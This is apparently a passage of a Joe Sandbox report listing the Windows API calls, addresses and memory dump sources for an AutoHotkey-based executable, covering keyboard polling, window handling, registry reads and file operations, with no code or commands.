      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32 ref: 0040A53A
      • Part of subcall function 0040A3F0: PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00402EC0: GetTickCount.KERNEL32(00402D03,?,?,?,?,?,?), ref: 00402EC0
      • Part of subcall function 004030C0: joyGetPosEx.WINMM ref: 004030EF
      • Part of subcall function 00402F00: GetTickCount.KERNEL32(?,0000000A), ref: 00402F83
      • Part of subcall function 00402F00: _strncpy.LIBCMT ref: 00402FF3
    • SetTimer.USER32(000601DA,00000009,0000000A), ref: 0040144A
    • GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040146F
      • Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2
    • GetMessageA.USER32(?,00000000,00000000,-00000311), ref: 004014B6
    • GetTickCount.KERNEL32 ref: 004014C1
    • GetFocus.USER32 ref: 0040155B
      • Part of subcall function 004764E0: GetWindowLongA.USER32(?,000000F0), ref: 004764F4
      • Part of subcall function 004764E0: GetParent.USER32(?), ref: 00476504
      • Part of subcall function 004764E0: GetWindowLongA.USER32(00000000,000000F0), ref: 0047650F
    • ShowWindow.USER32(000601DA,00000000), ref: 00401B84
      • Part of subcall function 0045A160: GetWindowLongA.USER32(00000000,000000F0), ref: 0045A1A0
      • Part of subcall function 0045A160: GetParent.USER32(00000000), ref: 0045A1AA
    • TranslateAccelerator.USER32(00000000,?,?), ref: 004015A1
      • Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012BC
      • Part of subcall function 004012B0: GetParent.USER32(00000000), ref: 004012C7
      • Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012D4
      • Part of subcall function 00466F60: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00466F7A
      • Part of subcall function 00466F60: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00466FB2
      • Part of subcall function 00466F60: SendMessageA.USER32(?,0000130C,-00000001,00000000), ref: 00466FF6
      • Part of subcall function 00466F60: GetDlgCtrlID.USER32 ref: 00467012
      • Part of subcall function 00466F60: PostMessageA.USER32(?,00000414,?,00000000), ref: 0046708A
    • GetKeyState.USER32(00000011), ref: 004018EA
    • GetWindowLongA.USER32(?,000000F0), ref: 00401912
    • GetKeyState.USER32(00000010), ref: 00401954
    • GetKeyState.USER32(00000011), ref: 004019C0
    • GetKeyState.USER32(000000A5), ref: 004019D5
    • SendMessageA.USER32(?,000000C2,00000001,0049881C), ref: 00401A1F
    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00401A3C
    • SendMessageA.USER32(00000000,00001116,00000000,00000000), ref: 00401A79
    • SendMessageA.USER32(00000000,00001116,00000001,00000000), ref: 00401A93
    • IsDialogMessage.USER32(?,?), ref: 00401AE3
    • KillTimer.USER32(000601DA,00000009), ref: 00401C52
    • GetForegroundWindow.USER32 ref: 00401CEB
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401CFE
    • GetClassNameA.USER32(00000000,?,00000020), ref: 00401D1B
    • IsDialogMessage.USER32(00000000,?), ref: 00401D5A
    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 00401D76
    • DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 00401EA8
    • DragFinish.SHELL32(?), ref: 00401EC3
    • GetTickCount.KERNEL32 ref: 00402122
    • DragFinish.SHELL32(00000000), ref: 004021C9
    • DragFinish.SHELL32(00000000), ref: 004021FA
    • GetTickCount.KERNEL32 ref: 0040225B
    • GetTickCount.KERNEL32 ref: 00402275
    • _strncpy.LIBCMT ref: 00402293
    • _strncpy.LIBCMT ref: 004022B2
    • _strncpy.LIBCMT ref: 00402317
      • Part of subcall function 004034E0: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545
      • Part of subcall function 004034E0: GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7
    • GetTickCount.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402343
    • TranslateAccelerator.USER32(000601DA,0024027F,?), ref: 00402D3F
    • TranslateMessage.USER32(?), ref: 00402D68
    • DispatchMessageA.USER32(?), ref: 00402D73
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00493552: FindMITargetTypeInstance.LIBCMT ref: 0049360D
      • Part of subcall function 00493552: FindVITargetTypeInstance.LIBCMT ref: 00493614
      • Part of subcall function 00493552: PMDtoOffset.LIBCMT ref: 00493626
      • Part of subcall function 00493552: std::bad_exception::bad_exception.LIBCMT ref: 00493650
    • CLSIDFromString.OLE32(0049E27C,?), ref: 00454194
    • CLSIDFromString.OLE32(0049E27C,?), ref: 00454200
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EF9E
      • Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EFD1
    • CLSIDFromString.OLE32(0049E27C,?), ref: 0045439D
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
      • Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
      • Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00493552: FindMITargetTypeInstance.LIBCMT ref: 0049360D
      • Part of subcall function 00493552: FindVITargetTypeInstance.LIBCMT ref: 00493614
      • Part of subcall function 00493552: PMDtoOffset.LIBCMT ref: 00493626
      • Part of subcall function 00493552: std::bad_exception::bad_exception.LIBCMT ref: 00493650
      • Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EF9E
      • Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EFD1
    • CLSIDFromString.OLE32(0049E27C,?), ref: 004533F5
    • GetActiveObject.OLEAUT32(?,00000000,?), ref: 00453443
      • Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F
      • Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
      • Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
      • Part of subcall function 00453A90: SysStringLen.OLEAUT32(?), ref: 00453C21
      • Part of subcall function 00453A90: SysFreeString.OLEAUT32(?), ref: 00453C47
      • Part of subcall function 00453A90: StringFromGUID2.OLE32(?,?,00000100), ref: 00453C91
      • Part of subcall function 00453A90: _strncpy.LIBCMT ref: 00453CCC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageA.USER32(?,0000110A), ref: 0044C61F
    • SendMessageA.USER32(?,0000110A,00000004), ref: 0044C637
    • SendMessageA.USER32(?,0000110A,00000001), ref: 0044C646
    • SendMessageA.USER32(?,0000110A,00000003), ref: 0044C655
    • SendMessageA.USER32(?,0000110A,00000001,00000000), ref: 0044C669
    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0044C678
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CharUpperA.USER32(?), ref: 0040C6EA
    • CharUpperA.USER32(?), ref: 0040C6FB
    • Sleep.KERNEL32(00000000), ref: 0040C7AB
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040D510
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D5C2
      • Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0040D5F8
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D618
      • Part of subcall function 0040D4E0: GetCurrentThreadId.KERNEL32 ref: 0040D64F
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040D688
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040D696
      • Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040D6F2
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
      • Part of subcall function 0040D4E0: GetKeyboardLayout.USER32(00000000), ref: 0040D708
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D757
      • Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
      • Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040D893
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D8E1
      • Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D930
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA37
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA4B
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA84
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DB33
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBA2
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBBC
      • Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DEC9
      • Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DF18
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DF44
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DFC0
      • Part of subcall function 0040D4E0: PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
      • Part of subcall function 0040D4E0: __itow.LIBCMT ref: 0040E021
      • Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040E31E
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040E400
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040E411
      • Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B1
      • Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B9
      • Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E4ED
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
      • Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
      • Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
      • Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040E559
      • Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E57E
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E585
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00441960: GetForegroundWindow.USER32 ref: 00441987
      • Part of subcall function 00441960: IsWindowVisible.USER32(00000000), ref: 004419A2
    • GetWindowThreadProcessId.USER32 ref: 0043403D
    • GetGUIThreadInfo.USER32(00000000), ref: 00434044
    • GetClassNameA.USER32(00000030,?,000000FC), ref: 00434067
    • EnumChildWindows.USER32(00000000,00434140,?), ref: 00434089
      • Part of subcall function 004719E0: _vswprintf_s.LIBCMT ref: 00471A13
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\AutoHotkey,00000000,00000000,?,00000000,?,?,?), ref: 004394BA
    • RegQueryValueExA.ADVAPI32 ref: 004394E6
    • RegCloseKey.ADVAPI32(00000000), ref: 004394F3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451D37
    • GetFileAttributesA.KERNEL32(?), ref: 00451D65
    • RemoveDirectoryA.KERNEL32(?), ref: 00451D8C
    • SHFileOperation.SHELL32 ref: 00451DE6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 00414670
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(user32,IsHungAppWindow,?,004755DA), ref: 00476576
    • GetProcAddress.KERNEL32(00000000,?,004755DA), ref: 0047657D
    • SendMessageTimeoutA.USER32(00000000,00000000,00000000,00000000,00000002,00001388,00000000), ref: 004765AF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CloseHandle.KERNEL32(00000000), ref: 00408BD3
    • CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd,?,001BC918,?,0040D550), ref: 00408BDE
    • GetLastError.KERNEL32 ref: 00408BE6
    • CloseHandle.KERNEL32(00000000), ref: 00408C0D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
    • GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CoInitialize.OLE32 ref: 00451428
    • CoCreateInstance.OLE32(00496770,00000000,00000001,00496760,00000000), ref: 00451441
    • GetKeyboardLayout.USER32(00000000), ref: 004514F0
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00451594
    • CoUninitialize.OLE32 ref: 004515E5
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004714E3
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 0047150C
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471541
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471572
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715A4
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715D6
      • Part of subcall function 004714C0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0047141F,00000000,?), ref: 00471679
      • Part of subcall function 00459EE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00459EF8
      • Part of subcall function 00466520: SendMessageA.USER32(FFFF8001,00000465,00000000,FFFF8001), ref: 0046654E
      • Part of subcall function 00466520: SendMessageA.USER32(00007FFF,0000046F,?,00007FFF), ref: 00466569
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000407,00000000,?), ref: 00466621
      • Part of subcall function 00466600: SendMessageA.USER32(00000000,00000408,00000001,?), ref: 00466631
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000414,?,00000000), ref: 00466653
      • Part of subcall function 00466600: SendMessageA.USER32(00000000,00000417,00000000,00000000), ref: 00466667
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000415,00000000,?), ref: 0046667B
      • Part of subcall function 00466600: SendMessageA.USER32(?,0000041B,00000001,00000000), ref: 0046668F
      • Part of subcall function 00466600: SendMessageA.USER32(?,0000041F,?,00000000), ref: 004666A4
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000001), ref: 004666BA
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000000,00000000), ref: 004666D0
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004666FC
      • Part of subcall function 004666E0: SendMessageA.USER32(?,0000102F,00000000,00000000), ref: 00466710
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001024,00000000,?), ref: 0046673F
      • Part of subcall function 004666E0: GetSysColor.USER32(00000005), ref: 00466753
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001026,00000000,?), ref: 00466766
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001001,00000000,?), ref: 00466773
      • Part of subcall function 004666E0: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0046677C
      • Part of subcall function 00466790: SendMessageA.USER32(?,0000111E,00000000,00000000), ref: 004667AE
      • Part of subcall function 00466790: GetSysColor.USER32(00000005), ref: 004667C1
      • Part of subcall function 00466790: SendMessageA.USER32(?,0000111D,00000000,?), ref: 004667D2
      • Part of subcall function 004667E0: LoadLibraryA.KERNEL32(uxtheme), ref: 0046680F
      • Part of subcall function 004667E0: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466821
      • Part of subcall function 004667E0: FreeLibrary.KERNEL32(00000000,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466839
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00000406,?,?), ref: 00466891
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00000409,00000000,FF000000), ref: 004668AA
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668C7
      • Part of subcall function 004667E0: GetSysColor.USER32(0000000F), ref: 004668E2
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668F8
    • __Stoull.NTSTC_LIBCMT ref: 004601BB
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    • __Stoull.NTSTC_LIBCMT ref: 00460248
    • __Stoull.NTSTC_LIBCMT ref: 00460361
    • __Stoull.NTSTC_LIBCMT ref: 00460466
    • EnableWindow.USER32(?,00000000), ref: 0046049F
    • __Stoull.NTSTC_LIBCMT ref: 004604D1
    • ShowWindow.USER32(?,-00000001), ref: 0046050E
    • __Stoull.NTSTC_LIBCMT ref: 004605C5
    • __Stoull.NTSTC_LIBCMT ref: 004606BF
    • __Stoull.NTSTC_LIBCMT ref: 004606EC
    • __Stoull.NTSTC_LIBCMT ref: 004607E1
    • __Stoull.NTSTC_LIBCMT ref: 0046085F
    • __Stoull.NTSTC_LIBCMT ref: 00460887
    • __Stoull.NTSTC_LIBCMT ref: 004608D3
    • SendMessageA.USER32(-000000F2,000000CF,00000000,00000000), ref: 00460995
    • __Stoull.NTSTC_LIBCMT ref: 00460BCE
    • SendMessageA.USER32(?,000000CC,?,00000000), ref: 00460C18
